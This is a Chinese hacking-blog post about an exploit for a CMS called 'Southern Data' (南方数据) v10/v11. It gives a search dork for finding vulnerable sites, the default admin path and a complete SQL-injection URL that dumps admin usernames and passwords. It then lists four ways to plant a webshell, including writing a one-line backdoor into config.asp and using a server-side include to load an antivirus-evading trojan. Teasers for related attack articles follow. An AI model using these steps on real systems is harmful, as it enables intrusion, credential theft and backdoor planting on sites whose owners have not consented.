南方数据网站漏洞

hacker5年前黑客文章1407

漏洞影响版本 v10.0 v11.0

关键字:inurl:”HomeMarket.asp”

默认后台:/admin

直接爆用户密码:
http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’

拿shell *** 貌似有4种:

1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。

2、进后台备份数据库

3、在网站配置的版权信息里插入一句话,一句话地址写入到http://www.xxx.com/inc/config.asp3.1、另外一种插配置:之一步  网站配置添加TXT保存成功后第2步传一个TXT小马小马要免杀的。第3步  网站配置 利用包含得到小马”%><!–#include file=”201331420455473.txt “–><%’填入网站配置。

4、编辑器:/admin/southidceditor/admin_style.asp

标签: 黑客技术

相关文章

各种网络环境渗透测试简述

一、渗透测试概念 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方...

AngryIPScanner是不是适用全部电脑操作系统?

AngryIPScanner是不是适用全部电脑操作系统?

什么是Angry IP Scanner? Angry IP Scanner是一个混合开发和一个开源系统互联网扫描机,建立迅速,便于应用。网络工程师一般 应用大中型和中小型企业,金融机构和政府部门。此...

SQLSERVER高级注入技巧

前言: 即是高级技巧,其它基本的注入方法就不详述了。 看不懂可查本站的注入基础文章。 为了更好的用好注入,建议大家看看本站的SQL语法相关文章 [获取全部数据库名] select name...

什么叫NetworkMiner互联网挖矿由网络信息安全手机

什么叫NetworkMiner互联网挖矿由网络信息安全手机

什么叫NetworkMiner? 互联网挖矿由网络信息安全手机软件经销商Netresec建立。Netresec主要从事互联网调查取证和数据流量剖析的手机软件和程序流程。显而易见,做为安全性技术专业工...

Nagios是不是适用全部电脑操作系统?

Nagios是不是适用全部电脑操作系统?

什么叫Nagios? Nagios是一个互联网和监视系统程序运行。它监控您特定的服务项目和服务器,当事儿受到影响或事儿越来越更强时友情提示。Nagios的很多作用包含:监控器全部IT系统架构,马上了...

我如何侵入医院电脑

 黑客入侵的方式有很多种,广义上讲我们可以分为网络入侵和物理入侵,本文就给大家讲一个物理入侵的故事。本文的目的不是教你如何入侵,而是让你看到在这个过程中医院在物理安全方面存在的错误,让大家在...